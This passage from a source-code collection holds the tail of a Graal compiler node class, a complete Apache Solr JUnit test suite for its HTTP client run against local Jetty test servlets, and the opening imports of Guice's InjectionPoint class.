UnsignedMinNode.create(m1, m2, view), view); } else { throw GraalError.shouldNotReachHere("unhandled node in reassociation with matched values: " + node); // ExcludeFromJacocoGeneratedReport } } private static boolean isNonExactMul(Node n) { if (n instanceof MulNode) { return !((MulNode) n).isExact(); } return false; } private static boolean isNonExactAdd(Node n) { if (n instanceof AddNode) { return !((AddNode) n).isExact(); } return false; } private static boolean isNonExactSub(Node n) { if (n instanceof SubNode) { return !((SubNode) n).isExact(); } return false; } private static boolean isNonExactAddOrSub(Node n) { return isNonExactAdd(n) || isNonExactSub(n); } private static boolean isExactMathOperation(Node n) { if (n instanceof AddNode) { return ((AddNode) n).isExact(); } if (n instanceof SubNode) { return ((SubNode) n).isExact(); } if (n instanceof MulNode) { return ((MulNode) n).isExact(); } return false; } /** * Ensure a canonical ordering of inputs for commutative nodes to improve GVN results. Order the * inputs by increasing {@link Node#id} and call {@link Graph#findDuplicate(Node)} on the node * if it's currently in a graph. It's assumed that if there was a constant on the left it's been * moved to the right by other code and that ordering is left alone. * * @return the original node or another node with the same input ordering */ @SuppressWarnings("deprecation") public BinaryNode maybeCommuteInputs() { assert this instanceof BinaryCommutative : Assertions.errorMessageContext("this", this); if (!y.isConstant() && (x.isConstant() || x.getId() > y.getId())) { ValueNode tmp = x; x = y; y = tmp; if (graph() != null) { // See if this node already exists BinaryNode duplicate = graph().findDuplicate(this); if (duplicate != null) { return duplicate; } } } return this; } /** * Determines if it would be better to swap the inputs in order to produce better assembly code. * First we try to pick a value which is dead after this use. If both values are dead at this * use then we try pick an induction variable phi to encourage the phi to live in a single * register. * * @param nodeValueMap * @return true if inputs should be swapped, false otherwise */ protected boolean shouldSwapInputs(NodeValueMap nodeValueMap) { final boolean xHasOtherUsages = getX().hasUsagesOtherThan(this, nodeValueMap); final boolean yHasOtherUsages = getY().hasUsagesOtherThan(this, nodeValueMap); if (!getY().isConstant() && !yHasOtherUsages) { if (xHasOtherUsages == yHasOtherUsages) { return getY() instanceof ValuePhiNode && getY().inputs().contains(this); } else { return true; } } return false; } }
apache/solr
35,588
solr/solrj/src/test/org/apache/solr/client/solrj/impl/BasicHttpSolrClientTest.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.solr.client.solrj.impl; import jakarta.servlet.ServletException; import jakarta.servlet.http.HttpServlet; import jakarta.servlet.http.HttpServletRequest; import jakarta.servlet.http.HttpServletResponse; import java.io.IOException; import java.io.InputStream; import java.lang.invoke.MethodHandles; import java.net.URISyntaxException; import java.nio.charset.StandardCharsets; import java.util.Arrays; import java.util.Collection; import java.util.Collections; import java.util.Enumeration; import java.util.HashMap; import java.util.Iterator; import java.util.List; import java.util.Map; import java.util.Set; import java.util.concurrent.TimeUnit; import java.util.stream.IntStream; import org.apache.http.Header; import org.apache.http.HttpEntity; import org.apache.http.HttpException; import org.apache.http.HttpRequest; import org.apache.http.HttpRequestInterceptor; import org.apache.http.HttpResponse; import org.apache.http.client.CookieStore; import org.apache.http.client.config.RequestConfig; import org.apache.http.client.methods.HttpGet; import org.apache.http.client.methods.HttpRequestWrapper; import org.apache.http.client.protocol.HttpClientContext; import org.apache.http.client.utils.URIBuilder; import org.apache.http.cookie.CookieSpec; import org.apache.http.impl.client.BasicCookieStore; import org.apache.http.impl.client.CloseableHttpClient; import org.apache.http.impl.cookie.BasicClientCookie; import org.apache.http.protocol.HttpContext; import org.apache.solr.SolrJettyTestBase; import org.apache.solr.SolrTestCaseJ4; import org.apache.solr.client.api.util.SolrVersion; import org.apache.solr.client.solrj.SolrClient; import org.apache.solr.client.solrj.SolrQuery; import org.apache.solr.client.solrj.SolrRequest; import org.apache.solr.client.solrj.SolrRequest.METHOD; import org.apache.solr.client.solrj.SolrServerException; import org.apache.solr.client.solrj.request.QueryRequest; import org.apache.solr.client.solrj.request.UpdateRequest; import org.apache.solr.client.solrj.response.QueryResponse; import org.apache.solr.common.SolrException; import org.apache.solr.common.SolrException.ErrorCode; import org.apache.solr.common.SolrInputDocument; import org.apache.solr.common.params.CommonParams; import org.apache.solr.common.params.ModifiableSolrParams; import org.apache.solr.common.util.NamedList; import org.apache.solr.common.util.SuppressForbidden; import org.apache.solr.embedded.JettyConfig; import org.eclipse.jetty.ee10.servlet.ServletHolder; import org.junit.BeforeClass; import org.junit.Test; import org.slf4j.Logger; import org.slf4j.LoggerFactory; public class BasicHttpSolrClientTest extends SolrJettyTestBase { private static final Logger log = LoggerFactory.getLogger(MethodHandles.lookup().lookupClass()); private static final String UA_VERSION = SolrVersion.LATEST_STRING; public static class RedirectServlet extends HttpServlet { @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { resp.sendRedirect("/solr/collection1/select?" + req.getQueryString()); } } public static class SlowServlet extends HttpServlet { @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { try { Thread.sleep(5000); } catch (InterruptedException ignored) { } } } public static class SlowStreamServlet extends HttpServlet { public static final int PACKET_MS = 500; @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException { String countStr = req.getParameter("count"); IntStream.range(0, countStr == null ? 10 : Integer.parseInt(countStr)) .forEach( i -> { try { Thread.sleep(PACKET_MS); resp.getOutputStream().write(String.valueOf(i).getBytes(StandardCharsets.UTF_8)); resp.getOutputStream().flush(); } catch (IOException | InterruptedException e) { throw new RuntimeException(e); } }); } } public static class DebugServlet extends HttpServlet { public static void clear() { lastMethod = null; headers = null; parameters = null; errorCode = null; queryString = null; cookies = null; } public static Integer errorCode = null; public static String lastMethod = null; public static HashMap<String, String> headers = null; public static Map<String, String[]> parameters = null; public static String queryString = null; public static jakarta.servlet.http.Cookie[] cookies = null; public static void setErrorCode(Integer code) { errorCode = code; } @Override protected void doDelete(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { lastMethod = "delete"; recordRequest(req, resp); } @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { lastMethod = "get"; recordRequest(req, resp); } @Override protected void doHead(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { lastMethod = "head"; recordRequest(req, resp); } private void setHeaders(HttpServletRequest req) { Enumeration<String> headerNames = req.getHeaderNames(); headers = new HashMap<>(); while (headerNames.hasMoreElements()) { final String name = headerNames.nextElement(); headers.put(name, req.getHeader(name)); } } @SuppressForbidden(reason = "fake servlet only") private void setParameters(HttpServletRequest req) { parameters = req.getParameterMap(); } private void setQueryString(HttpServletRequest req) { queryString = req.getQueryString(); } private void setCookies(HttpServletRequest req) { jakarta.servlet.http.Cookie[] ck = req.getCookies(); cookies = req.getCookies(); } @Override protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { lastMethod = "post"; recordRequest(req, resp); } @Override protected void doPut(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { lastMethod = "put"; recordRequest(req, resp); } private void recordRequest(HttpServletRequest req, HttpServletResponse resp) { setHeaders(req); setParameters(req); setQueryString(req); setCookies(req); if (null != errorCode) { try { resp.sendError(errorCode); } catch (IOException e) { throw new RuntimeException("sendError IO fail in DebugServlet", e); } } } } @BeforeClass public static void beforeTest() throws Exception { JettyConfig jettyConfig = JettyConfig.builder() .withServlet(new ServletHolder(RedirectServlet.class), "/redirect/*") .withServlet(new ServletHolder(SlowServlet.class), "/slow/*") .withServlet(new ServletHolder(DebugServlet.class), "/debug/*") .withServlet(new ServletHolder(SlowStreamServlet.class), "/slowStream/*") .build(); createAndStartJetty(legacyExampleCollection1SolrHome(), jettyConfig); } @Test public void testTimeout() throws Exception { SolrQuery q = new SolrQuery("*:*"); final var queryRequest = new QueryRequest(q); queryRequest.setPath("/slow/foo" + queryRequest.getPath()); try (SolrClient client = new HttpSolrClient.Builder(getBaseUrl()) .withConnectionTimeout(DEFAULT_CONNECTION_TIMEOUT, TimeUnit.MILLISECONDS) .withSocketTimeout(2000, TimeUnit.MILLISECONDS) .build()) { SolrServerException e = expectThrows(SolrServerException.class, () -> queryRequest.process(client)); assertTrue(e.getMessage().contains("Timeout")); } } /** * test that SolrExceptions thrown by HttpSolrClient can correctly encapsulate http status codes * even when not on the list of ErrorCodes solr may return. */ public void testSolrExceptionCodeNotFromSolr() throws IOException, SolrServerException { final int status = 527; assertEquals( status + " didn't generate an UNKNOWN error code, someone modified the list of valid ErrorCode's w/o changing this test to work a different way", ErrorCode.UNKNOWN, ErrorCode.getErrorCode(status)); try (SolrClient client = getHttpSolrClient(getBaseUrl())) { DebugServlet.setErrorCode(status); SolrQuery q = new SolrQuery("foo"); final var queryRequest = new QueryRequest(q); queryRequest.setPath("/debug/foo" + queryRequest.getPath()); SolrException e = expectThrows(SolrException.class, () -> queryRequest.process(client)); assertEquals("Unexpected exception status code", status, e.code()); } finally { DebugServlet.clear(); } } @Test public void testQuery() throws Exception { DebugServlet.clear(); final String debugPath = "/debug/foo"; SolrQuery q = new SolrQuery("foo"); q.setParam("a", "\u1234"); final var queryRequest = new QueryRequest(q); queryRequest.setPath(debugPath); try (HttpSolrClient client = getHttpSolrClient(getBaseUrl())) { expectThrows(SolrClient.RemoteSolrException.class, () -> queryRequest.process(client)); // default method assertEquals("get", DebugServlet.lastMethod); // agent assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); // default wt assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("javabin", DebugServlet.parameters.get(CommonParams.WT)[0]); // agent assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); // keepalive assertEquals("keep-alive", DebugServlet.headers.get("Connection")); // content-type assertNull(DebugServlet.headers.get("Content-Type")); // param encoding assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); // POST DebugServlet.clear(); queryRequest.setMethod(METHOD.POST); expectThrows(SolrClient.RemoteSolrException.class, () -> queryRequest.process(client)); assertEquals("post", DebugServlet.lastMethod); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("javabin", DebugServlet.parameters.get(CommonParams.WT)[0]); assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals("keep-alive", DebugServlet.headers.get("Connection")); assertEquals( "application/x-www-form-urlencoded; charset=UTF-8", DebugServlet.headers.get("Content-Type")); // PUT DebugServlet.clear(); queryRequest.setMethod(METHOD.PUT); expectThrows(SolrClient.RemoteSolrException.class, () -> queryRequest.process(client)); assertEquals("put", DebugServlet.lastMethod); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("javabin", DebugServlet.parameters.get(CommonParams.WT)[0]); assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals("keep-alive", DebugServlet.headers.get("Connection")); assertEquals( "application/x-www-form-urlencoded; charset=UTF-8", DebugServlet.headers.get("Content-Type")); } // XML try (HttpSolrClient client = new HttpSolrClient.Builder(getBaseUrl()) .withResponseParser(new XMLResponseParser()) .build()) { // XML/GET DebugServlet.clear(); queryRequest.setMethod(METHOD.GET); // Reset to the default here after using 'PUT' above expectThrows(SolrClient.RemoteSolrException.class, () -> queryRequest.process(client)); assertEquals("get", DebugServlet.lastMethod); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("xml", DebugServlet.parameters.get(CommonParams.WT)[0]); assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals("keep-alive", DebugServlet.headers.get("Connection")); // XML/POST DebugServlet.clear(); queryRequest.setMethod(METHOD.POST); expectThrows(SolrClient.RemoteSolrException.class, () -> queryRequest.process(client)); assertEquals("post", DebugServlet.lastMethod); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("xml", DebugServlet.parameters.get(CommonParams.WT)[0]); assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals("keep-alive", DebugServlet.headers.get("Connection")); assertEquals( "application/x-www-form-urlencoded; charset=UTF-8", DebugServlet.headers.get("Content-Type")); DebugServlet.clear(); queryRequest.setMethod(METHOD.PUT); expectThrows(SolrClient.RemoteSolrException.class, () -> queryRequest.process(client)); assertEquals("put", DebugServlet.lastMethod); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("xml", DebugServlet.parameters.get(CommonParams.WT)[0]); assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals("keep-alive", DebugServlet.headers.get("Connection")); assertEquals( "application/x-www-form-urlencoded; charset=UTF-8", DebugServlet.headers.get("Content-Type")); } } @Test public void testDelete() throws Exception { DebugServlet.clear(); final String debugPath = "/debug/foo"; try (HttpSolrClient client = getHttpSolrClient(getBaseUrl())) { final UpdateRequest deleteById = new UpdateRequest(); deleteById.deleteById("id"); deleteById.setPath(debugPath + deleteById.getPath()); expectThrows(SolrClient.RemoteSolrException.class, () -> deleteById.process(client)); // default method assertEquals("post", DebugServlet.lastMethod); // agent assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); // default wt assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("javabin", DebugServlet.parameters.get(CommonParams.WT)[0]); // agent assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); // keepalive assertEquals("keep-alive", DebugServlet.headers.get("Connection")); } // XML try (HttpSolrClient client = new HttpSolrClient.Builder(getBaseUrl()) .withResponseParser(new XMLResponseParser()) .build()) { final var deleteByQueryRequest = new UpdateRequest(); deleteByQueryRequest.setPath(debugPath + deleteByQueryRequest.getPath()); deleteByQueryRequest.deleteByQuery("*:*"); deleteByQueryRequest.setCommitWithin(-1); expectThrows( SolrClient.RemoteSolrException.class, () -> deleteByQueryRequest.process(client)); assertEquals("post", DebugServlet.lastMethod); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("xml", DebugServlet.parameters.get(CommonParams.WT)[0]); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals("keep-alive", DebugServlet.headers.get("Connection")); } } @Test public void testGetById() throws Exception { DebugServlet.clear(); try (SolrClient client = getHttpSolrClient(getBaseUrl() + "/debug/foo")) { Collection<String> ids = Collections.singletonList("a"); expectThrows(SolrClient.RemoteSolrException.class, () -> client.getById("a")); expectThrows(SolrClient.RemoteSolrException.class, () -> client.getById(ids, null)); expectThrows(SolrClient.RemoteSolrException.class, () -> client.getById("foo", "a")); expectThrows(SolrClient.RemoteSolrException.class, () -> client.getById("foo", ids, null)); } } @Test public void testUpdate() throws Exception { DebugServlet.clear(); final String debugPath = "/debug/foo"; try (HttpSolrClient client = getHttpSolrClient(getBaseUrl())) { UpdateRequest req = new UpdateRequest(); req.add(new SolrInputDocument()); req.setPath(debugPath + req.getPath()); req.setParam("a", "\u1234"); expectThrows(SolrClient.RemoteSolrException.class, () -> req.process(client)); // default method assertEquals("post", DebugServlet.lastMethod); // agent assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); // default wt assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("javabin", DebugServlet.parameters.get(CommonParams.WT)[0]); // content type assertEquals("application/javabin", DebugServlet.headers.get("Content-Type")); // parameter encoding assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); } DebugServlet.clear(); // XML response and writer try (HttpSolrClient client = new HttpSolrClient.Builder(getBaseUrl()) .withRequestWriter(new XMLRequestWriter()) .withResponseParser(new XMLResponseParser()) .build()) { UpdateRequest req = new UpdateRequest(); req.add(new SolrInputDocument()); req.setPath(debugPath + req.getPath()); req.setParam("a", "\u1234"); expectThrows(SolrClient.RemoteSolrException.class, () -> client.request(req)); assertEquals("post", DebugServlet.lastMethod); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("xml", DebugServlet.parameters.get(CommonParams.WT)[0]); assertEquals("application/xml; charset=UTF-8", DebugServlet.headers.get("Content-Type")); assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); } DebugServlet.clear(); // javabin request try (HttpSolrClient client = new HttpSolrClient.Builder(getBaseUrl()) .withRequestWriter(new JavaBinRequestWriter()) .withResponseParser(new JavaBinResponseParser()) .build()) { UpdateRequest req = new UpdateRequest(); req.add(new SolrInputDocument()); req.setPath(debugPath + req.getPath()); req.setParam("a", "\u1234"); expectThrows(SolrClient.RemoteSolrException.class, () -> client.request(req)); assertEquals("post", DebugServlet.lastMethod); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("javabin", DebugServlet.parameters.get(CommonParams.WT)[0]); assertEquals("application/javabin", DebugServlet.headers.get("Content-Type")); assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); } } @Test public void testRedirect() throws Exception { final String redirectPath = "/redirect/foo"; SolrQuery q = new SolrQuery("*:*"); final var queryRequest = new QueryRequest(q); queryRequest.setPath(redirectPath + queryRequest.getPath()); // default for redirect is false. try (HttpSolrClient client = new HttpSolrClient.Builder(getBaseUrl()).build()) { SolrServerException e = expectThrows(SolrServerException.class, () -> queryRequest.process(client)); assertTrue(e.getMessage().contains("redirect")); } try (HttpSolrClient client = new HttpSolrClient.Builder(getBaseUrl()).withFollowRedirects(true).build()) { // No exception expected queryRequest.process(client); } // And with explicit false: try (HttpSolrClient client = new HttpSolrClient.Builder(getBaseUrl()).withFollowRedirects(false).build()) { SolrServerException e = expectThrows(SolrServerException.class, () -> queryRequest.process(client)); assertTrue(e.getMessage().contains("redirect")); } } @Test public void testCompression() throws Exception { final String debugPath = "/debug/foo"; final SolrQuery q = new SolrQuery("*:*"); final var queryRequest = new QueryRequest(q); queryRequest.setPath(debugPath + queryRequest.getPath()); try (SolrClient client = getHttpSolrClient(getBaseUrl())) { // verify request header gets set DebugServlet.clear(); expectThrows(SolrClient.RemoteSolrException.class, () -> queryRequest.process(client)); assertNull(DebugServlet.headers.toString(), DebugServlet.headers.get("Accept-Encoding")); } try (SolrClient client = new HttpSolrClient.Builder(getBaseUrl()).allowCompression(true).build()) { try { queryRequest.process(client); } catch (SolrClient.RemoteSolrException ignored) { } assertNotNull(DebugServlet.headers.get("Accept-Encoding")); } try (SolrClient client = new HttpSolrClient.Builder(getBaseUrl()).allowCompression(false).build()) { try { queryRequest.process(client); } catch (SolrClient.RemoteSolrException ignored) { } } assertNull(DebugServlet.headers.get("Accept-Encoding")); // verify server compresses output HttpGet get = new HttpGet(getCoreUrl() + "/select?q=foo&wt=xml"); get.setHeader("Accept-Encoding", "gzip"); ModifiableSolrParams params = new ModifiableSolrParams(); params.set(HttpClientUtil.PROP_ALLOW_COMPRESSION, true); RequestConfig config = RequestConfig.custom().setDecompressionEnabled(false).build(); get.setConfig(config); CloseableHttpClient httpclient = HttpClientUtil.createClient(params); HttpEntity entity = null; try { HttpResponse response = httpclient.execute(get, HttpClientUtil.createNewHttpClientRequestContext()); entity = response.getEntity(); Header ceheader = entity.getContentEncoding(); assertNotNull(Arrays.asList(response.getAllHeaders()).toString(), ceheader); assertEquals("gzip", ceheader.getValue()); } finally { if (entity != null) { entity.getContent().close(); } HttpClientUtil.close(httpclient); } // verify compressed response can be handled try (SolrClient client = getHttpSolrClient(getBaseUrl(), DEFAULT_TEST_COLLECTION_NAME)) { QueryResponse response = client.query(new SolrQuery("foo")); assertEquals(0, response.getStatus()); } } @Test public void testCollectionParameters() throws IOException, SolrServerException { try (SolrClient client = getHttpSolrClient(getBaseUrl())) { SolrInputDocument doc = new SolrInputDocument(); doc.addField("id", "collection"); client.add("collection1", doc); client.commit("collection1"); assertEquals( 1, client.query("collection1", new SolrQuery("id:collection")).getResults().getNumFound()); } try (SolrClient client = getHttpSolrClient(getBaseUrl(), DEFAULT_TEST_CORENAME)) { assertEquals(1, client.query(new SolrQuery("id:collection")).getResults().getNumFound()); } } @Test public void testGetRawStream() throws SolrServerException, IOException { CloseableHttpClient httpClient = HttpClientUtil.createClient(null); try (SolrClient solrClient = new HttpSolrClient.Builder(getBaseUrl()) .withDefaultCollection(DEFAULT_TEST_CORENAME) .withHttpClient(httpClient) .withResponseParser(null) .build(); ) { QueryRequest req = new QueryRequest(); NamedList<?> response = solrClient.request(req); InputStream stream = (InputStream) response.get("stream"); assertNotNull(stream); stream.close(); } finally { HttpClientUtil.close(httpClient); } } /** An interceptor changing the request */ HttpRequestInterceptor changeRequestInterceptor = new HttpRequestInterceptor() { @Override public void process(HttpRequest request, HttpContext context) throws HttpException, IOException { log.info("Intercepted params: {}", context); HttpRequestWrapper wrapper = (HttpRequestWrapper) request; URIBuilder uribuilder = new URIBuilder(wrapper.getURI()); uribuilder.addParameter("b", "\u4321"); try { wrapper.setURI(uribuilder.build()); } catch (URISyntaxException ex) { throw new HttpException("Invalid request URI", ex); } } }; public static final String cookieName = "cookieName"; public static final String cookieValue = "cookieValue"; /** An interceptor setting a cookie */ HttpRequestInterceptor cookieSettingRequestInterceptor = new HttpRequestInterceptor() { @Override public void process(HttpRequest request, HttpContext context) throws HttpException, IOException { BasicClientCookie cookie = new BasicClientCookie(cookieName, cookieValue); cookie.setVersion(0); cookie.setPath("/"); cookie.setDomain(getJetty().getBaseUrl().getHost()); CookieStore cookieStore = new BasicCookieStore(); CookieSpec cookieSpec = new SolrPortAwareCookieSpecFactory().create(context); // CookieSpec cookieSpec = registry.lookup(policy).create(context); // Add the cookies to the request List<Header> headers = cookieSpec.formatCookies(Collections.singletonList(cookie)); for (Header header : headers) { request.addHeader(header); } context.setAttribute(HttpClientContext.COOKIE_STORE, cookieStore); } }; /** * Set cookies via interceptor Change the request via an interceptor Ensure cookies are actually * set and that request is actually changed */ @Test public void testInterceptors() { DebugServlet.clear(); HttpClientUtil.addRequestInterceptor(changeRequestInterceptor); HttpClientUtil.addRequestInterceptor(cookieSettingRequestInterceptor); final String debugPath = "/debug/foo"; try (SolrClient server = getHttpSolrClient(getBaseUrl())) { SolrQuery q = new SolrQuery("foo"); q.setParam("a", "\u1234"); final var queryRequest = new QueryRequest(q); queryRequest.setPath(debugPath + queryRequest.getPath()); expectThrows( Exception.class, () -> { queryRequest.setMethod(random().nextBoolean() ? METHOD.POST : METHOD.GET); queryRequest.process(server); }); // Assert cookies from UseContextCallback assertNotNull(DebugServlet.cookies); boolean foundCookie = false; for (jakarta.servlet.http.Cookie cookie : DebugServlet.cookies) { if (cookieName.equals(cookie.getName()) && cookieValue.equals(cookie.getValue())) { foundCookie = true; break; } } assertTrue(foundCookie); // Assert request changes by ChangeRequestCallback assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); assertEquals("\u4321", DebugServlet.parameters.get("b")[0]); } catch (IOException ex) { throw new RuntimeException(ex); } finally { HttpClientUtil.removeRequestInterceptor(changeRequestInterceptor); HttpClientUtil.removeRequestInterceptor(cookieSettingRequestInterceptor); } } private void setReqParamsOf(UpdateRequest req, String... keys) { if (keys != null) { for (String k : keys) { req.setParam(k, k + "Value"); } } } private void verifyServletState(HttpSolrClient client, SolrRequest<?> request) { // check query String Iterator<String> paramNames = request.getParams().getParameterNamesIterator(); while (paramNames.hasNext()) { String name = paramNames.next(); String[] values = request.getParams().getParams(name); if (values != null) { for (String value : values) { boolean shouldBeInQueryString = client.getUrlParamNames().contains(name) || (request.getQueryParams() != null && request.getQueryParams().contains(name)); assertEquals( shouldBeInQueryString, DebugServlet.queryString.contains(name + "=" + value)); // in either case, it should be in the parameters assertNotNull(DebugServlet.parameters.get(name)); assertEquals(1, DebugServlet.parameters.get(name).length); assertEquals(value, DebugServlet.parameters.get(name)[0]); } } } } @Test public void testQueryString() throws Exception { final String debugPath = "/debug/foo"; HttpSolrClient.Builder builder = new HttpSolrClient.Builder(getBaseUrl()); try (HttpSolrClient client = builder.withTheseParamNamesInTheUrl(Set.of("serverOnly")).build()) { // test without request query params DebugServlet.clear(); UpdateRequest req = new UpdateRequest(); req.setPath(debugPath + req.getPath()); setReqParamsOf(req, "serverOnly", "notServer"); expectThrows(SolrClient.RemoteSolrException.class, () -> client.request(req)); verifyServletState(client, req); } try (HttpSolrClient client = builder.withTheseParamNamesInTheUrl(Set.of()).build()) { // test without server query params DebugServlet.clear(); UpdateRequest req2 = new UpdateRequest(); req2.setPath(debugPath + req2.getPath()); req2.setQueryParams(Set.of("requestOnly")); setReqParamsOf(req2, "requestOnly", "notRequest"); expectThrows(SolrClient.RemoteSolrException.class, () -> client.request(req2)); verifyServletState(client, req2); } try (HttpSolrClient client = builder.withTheseParamNamesInTheUrl(Set.of("serverOnly", "both")).build()) { // test with both request and server query params DebugServlet.clear(); UpdateRequest req3 = new UpdateRequest(); req3.setPath(debugPath + req3.getPath()); req3.setQueryParams(Set.of("requestOnly", "both")); setReqParamsOf(req3, "serverOnly", "requestOnly", "both", "neither"); expectThrows(SolrClient.RemoteSolrException.class, () -> client.request(req3)); verifyServletState(client, req3); } try (HttpSolrClient client = builder.withTheseParamNamesInTheUrl(Set.of("serverOnly", "both")).build()) { // test with both request and server query params with single stream DebugServlet.clear(); UpdateRequest req4 = new UpdateRequest(); req4.setPath(debugPath + req4.getPath()); req4.add(new SolrInputDocument()); req4.setQueryParams(Set.of("requestOnly", "both")); setReqParamsOf(req4, "serverOnly", "requestOnly", "both", "neither"); expectThrows(SolrClient.RemoteSolrException.class, () -> client.request(req4)); // NOTE: single stream requests send all the params // as part of the query string. So add "neither" to the request, // so it passes the verification step. req4.setQueryParams(Set.of("requestOnly", "both", "neither")); verifyServletState(client, req4); } } @Test @SuppressWarnings({"try"}) public void testInvariantParams() throws IOException { try (HttpSolrClient createdClient = new HttpSolrClient.Builder() .withBaseSolrUrl(getBaseUrl()) .withInvariantParams(SolrTestCaseJ4.params("param", "value")) .build()) { assertEquals("value", createdClient.getInvariantParams().get("param")); } try (HttpSolrClient createdClient = new HttpSolrClient.Builder() .withBaseSolrUrl(getBaseUrl()) .withInvariantParams(SolrTestCaseJ4.params("fq", "fq1", "fq", "fq2")) .build()) { assertEquals(2, createdClient.getInvariantParams().getParams("fq").length); } } }
google/guice
36,058
core/src/com/google/inject/spi/InjectionPoint.java
/* * Copyright (C) 2008 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.inject.spi; import static com.google.inject.internal.MoreTypes.getRawType; import com.google.common.collect.ImmutableList; import com.google.common.collect.ImmutableSet; import com.google.common.collect.Iterables; import com.google.common.collect.Lists; import com.google.common.collect.ObjectArrays; import com.google.inject.ConfigurationException; import com.google.inject.Inject; import com.google.inject.Key; import com.google.inject.TypeLiteral; import com.google.inject.internal.Annotations; import com.google.inject.internal.DeclaredMembers; import com.google.inject.internal.Errors; import com.google.inject.internal.ErrorsException; import com.google.inject.internal.KotlinSupport; import com.google.inject.internal.Nullability; import com.google.inject.internal.util.Classes; import java.lang.annotation.Annotation; import java.lang.reflect.AnnotatedElement; import java.lang.reflect.AnnotatedType; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.Member; import java.lang.reflect.Method; import 